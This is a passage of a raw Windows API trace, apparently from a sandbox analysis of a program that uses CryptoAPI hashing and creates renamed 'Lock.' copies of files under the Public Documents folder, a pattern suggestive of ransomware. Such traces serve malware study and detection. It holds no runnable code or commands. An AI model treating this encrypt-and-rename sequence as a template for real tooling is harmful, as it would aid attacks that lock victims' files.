[0267.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0267.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0267.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0267.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0267.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0267.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0267.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0267.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0267.611] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0267.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0267.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0267.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0267.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0267.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466e50 [0267.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e50, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0267.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0267.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0267.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e50 | out: hHeap=0x25c0000) returned 1 [0267.612] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0267.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0267.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0267.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0267.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0267.612] CryptDestroyHash (hHash=0xaa58a0) returned 1 [0267.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0267.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0267.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0267.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0267.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0267.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0267.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0267.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0267.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0267.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0267.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0267.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0267.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0267.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0267.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0267.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0267.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0267.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0267.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0267.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0267.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0267.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0267.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0267.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0267.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0267.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0267.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0267.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0267.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0267.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0267.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0267.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0267.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0267.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0267.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0267.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0267.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0267.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0267.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0267.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0267.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0267.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0267.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0267.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0267.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0267.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0267.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0267.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0267.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.615] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0267.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0267.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0267.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0267.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0267.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0267.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0267.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0267.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0267.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0267.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0267.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0267.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0267.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0267.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0267.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0267.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0267.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0267.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0267.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0267.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0267.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0267.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0267.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0267.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0267.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0267.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0267.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0267.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0267.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0267.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0267.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0267.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0267.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0267.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0267.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0267.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0267.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0267.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0267.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0267.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0267.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0267.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0267.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0267.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0267.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0267.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0267.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0267.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0267.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0267.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0267.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0267.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0267.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0267.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0267.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0267.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0267.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0267.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0267.629] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0267.642] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.642] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.642] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0267.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0267.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0267.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.642] CreateFileW (lpFileName="C:\\Users\\Public\\Documents/My Videos" (normalized: "c:\\users\\public\\documents\\my videos"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0267.643] GetLastError () returned 0x5 [0267.643] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0267.643] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.643] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0267.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0267.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0267.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0267.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0267.643] CreateFileW (lpFileName="C:\\Users\\Public\\Documents/Lock.My Videos" (normalized: "c:\\users\\public\\documents\\lock.my videos"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0267.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0267.644] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0267.644] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.644] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0267.644] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0267.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0267.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0267.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0267.645] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0267.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0267.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0267.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0267.645] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0267.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0267.645] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0267.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0267.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0267.645] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0267.645] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 